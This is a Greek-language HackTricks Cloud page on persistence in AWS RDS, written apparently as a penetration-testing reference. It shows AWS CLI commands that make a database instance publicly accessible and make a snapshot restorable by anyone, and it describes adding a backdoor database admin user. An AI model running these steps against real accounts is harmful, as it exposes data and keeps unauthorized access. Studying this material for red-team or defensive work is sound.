HackTricks CloudAWS - RDS Διατήρηση
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
RDS
Για περισσότερες πληροφορίες δείτε:
AWS - Relational Database (RDS) Enum
Κάντε το instance δημόσια προσβάσιμο: rds:ModifyDBInstance
Ένας επιτιθέμενος με αυτήν την άδεια μπορεί να τροποποιήσει ένα υπάρχον RDS instance για να ενεργοποιήσει τη δημόσια προσβασιμότητα.
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
Δημιουργία χρήστη admin μέσα στη DB
Ένας επιτιθέμενος μπορεί απλώς να δημιουργήσει έναν χρήστη μέσα στη DB, έτσι ώστε ακόμη και αν ο κωδικός του master user τροποποιηθεί, να μην χάσει την πρόσβαση στη βάση δεδομένων.
Κάντε το snapshot δημόσιο
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
Tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
Μάθετε & εξασκηθείτε στο GCP Hacking:
Μάθετε & εξασκηθείτε στο Az Hacking:Υποστηρίξτε το HackTricks
- Δείτε τα subscription plans!
- Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.